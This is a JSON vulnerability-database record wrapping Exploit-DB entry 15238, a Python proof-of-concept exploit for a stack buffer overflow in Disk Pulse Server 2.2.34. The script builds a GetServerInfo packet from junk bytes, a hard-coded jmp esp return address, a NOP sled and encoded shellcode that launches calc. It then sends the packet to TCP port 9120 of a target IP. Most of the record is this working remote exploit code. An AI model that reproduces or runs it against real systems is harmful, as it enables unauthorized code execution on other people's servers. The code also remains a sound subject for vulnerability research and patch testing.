{"id": "EDB-ID:15238", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Disk Pulse Server 2.2.34 - Remote Buffer Overflow", "description": "", "published": "2010-10-12T00:00:00", "modified": "2010-10-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/15238", "reporter": "xsploited security", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T04:54:58", "viewCount": 10, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 0.6}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "41cd5af6f7b1eeb9e768da64daee7d31"}, "sourceHref": "https://www.exploit-db.com/download/15238", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit\r\n# Date: 10/11/2010\r\n# Author: xsploited security\r\n# URL: http://www.x-sploited.com/\r\n# Contact: xsploitedsecurity [at] gmail.com\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe\r\n# Version: v2.2.34\r\n# Tested on: Windows XP SP3 (Physical machine)\r\n# CVE : N/A\r\n\r\n# Vulnerability Information:\r\n# A vulnerability exists in the way Disk Pulse Server v2.2.34 processes a remote client's \"GetServerInfo\" request.\r\n# The vulnerability is caused by a boundary error in libpal.dll when handling network messages and can be exploited\r\n# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.\r\n# Note: the return address used below (0x71ABF8FB, a jmp esp inside ws2_32.dll) was taken from the Windows XP SP3 test machine;\r\n# a hard-coded address like this will generally differ on other Windows builds, so EIP must be re-derived per target before the PoC is reliable.\r\n\r\n# Other notes:\r\n# It appears the vendor likes using the same server code (that was affected by my previous PoC: http://www.exploit-db.com/exploits/15231)\r\n# for everything client/server related. 
It is also safe to say that the client(s) are most likely effected by bugs as well.\r\n\r\n# Other possibly affected versions:\r\n# Disk Pulse Server <= 1.7.x\r\n\r\n# References:\r\n# http://secunia.com/advisories/41748/\r\n# http://www.exploit-db.com/exploits/15231\r\n# http://securityreason.com/exploitalert/9247\r\n\r\n# Shouts:\r\n# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.\r\n\r\nimport sys,socket\r\n\r\nif len(sys.argv) != 2:\r\n print \"[!] Usage: ./diskpulse.py <Target IP>\"\r\n sys.exit(1)\r\n\r\nabout = \"=================================================\\n\"\r\nabout += \"Title: Disk Pulse Server v2.2.34 Remote BOF PoC\\n\"\r\nabout += \"Author: xsploited security\\nURL: http://www.x-sploited.com/\\n\"\r\nabout += \"Contact: xsploitedsecurity [at] gmail.com\\n\"\r\nabout += \"=================================================\\n\"\r\nprint about\r\n\r\nhost = sys.argv[1]\r\nport = 9120 #default server port\r\n\r\n# windows/exec - 218 bytes / http://www.metasploit.com\r\n# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc\r\ncalc = (\"\\x6a\\x31\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x97\\x8c\" \r\n\"\\x8a\\x10\\x83\\xeb\\xfc\\xe2\\xf4\\x6b\\x64\\x03\\x10\\x97\\x8c\\xea\\x99\" \r\n\"\\x72\\xbd\\x58\\x74\\x1c\\xde\\xba\\x9b\\xc5\\x80\\x01\\x42\\x83\\x07\\xf8\" \r\n\"\\x38\\x98\\x3b\\xc0\\x36\\xa6\\x73\\xbb\\xd0\\x3b\\xb0\\xeb\\x6c\\x95\\xa0\" \r\n\"\\xaa\\xd1\\x58\\x81\\x8b\\xd7\\x75\\x7c\\xd8\\x47\\x1c\\xde\\x9a\\x9b\\xd5\" \r\n\"\\xb0\\x8b\\xc0\\x1c\\xcc\\xf2\\x95\\x57\\xf8\\xc0\\x11\\x47\\xdc\\x01\\x58\" \r\n\"\\x8f\\x07\\xd2\\x30\\x96\\x5f\\x69\\x2c\\xde\\x07\\xbe\\x9b\\x96\\x5a\\xbb\" \r\n\"\\xef\\xa6\\x4c\\x26\\xd1\\x58\\x81\\x8b\\xd7\\xaf\\x6c\\xff\\xe4\\x94\\xf1\" \r\n\"\\x72\\x2b\\xea\\xa8\\xff\\xf2\\xcf\\x07\\xd2\\x34\\x96\\x5f\\xec\\x9b\\x9b\" \r\n\"\\xc7\\x01\\x48\\x8b\\x8d\\x59\\x9b\\x93\\x07\\x8b\\xc0\\x1e\\xc8\\xae\\x34\" 
\r\n\"\\xcc\\xd7\\xeb\\x49\\xcd\\xdd\\x75\\xf0\\xcf\\xd3\\xd0\\x9b\\x85\\x67\\x0c\" \r\n\"\\x4d\\xfd\\x8d\\x07\\x95\\x2e\\x8c\\x8a\\x10\\xc7\\xe4\\xbb\\x9b\\xf8\\x0b\" \r\n\"\\x75\\xc5\\x2c\\x72\\x84\\x22\\x7d\\xe4\\x2c\\x85\\x2a\\x11\\x75\\xc5\\xab\" \r\n\"\\x8a\\xf6\\x1a\\x17\\x77\\x6a\\x65\\x92\\x37\\xcd\\x03\\xe5\\xe3\\xe0\\x10\" \r\n\"\\xc4\\x73\\x5f\\x73\\xf6\\xe0\\xe9\\x10\");\r\n\t\r\n# Begin payload buffer:\r\n\r\npacket_header = (\"\\x47\\x65\\x74\\x53\\x65\\x72\\x76\\x65\\x72\\x49\\x6E\\x66\\x6F\\x02\");\t\t# ASCII = \"GetServerInfo.\"\r\n\r\njunk = \"\\x41\" * 256; \t\t\t#256 byte junk buffer to reach eip\r\neip = \"\\xFB\\xF8\\xAB\\x71\";\t\t#jmp esp (via ws2_32.dll)\r\nnops = \"\\x90\" * 12;\t\t\t\t#small nop sled\r\n\r\n# packet structure:\r\n# [header][junk][eip][nops][shellcode][nops][nops]\r\npacket = packet_header + junk + eip + nops + calc + nops + nops;\r\n\r\nprint \"[*] Connecting to \" + host + \"...\\r\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host,port))\r\nprint \"[*] Connected, Sending payload\\r\"\r\ns.send(packet + \"\\r\\n\")\r\nprint \"[*] Payload sent successfully\"\r\nprint \"[*] Check the results\\r\"\r\ns.close()", "osvdbidlist": ["68610"], "exploitType": "remote", "verified": true}
{}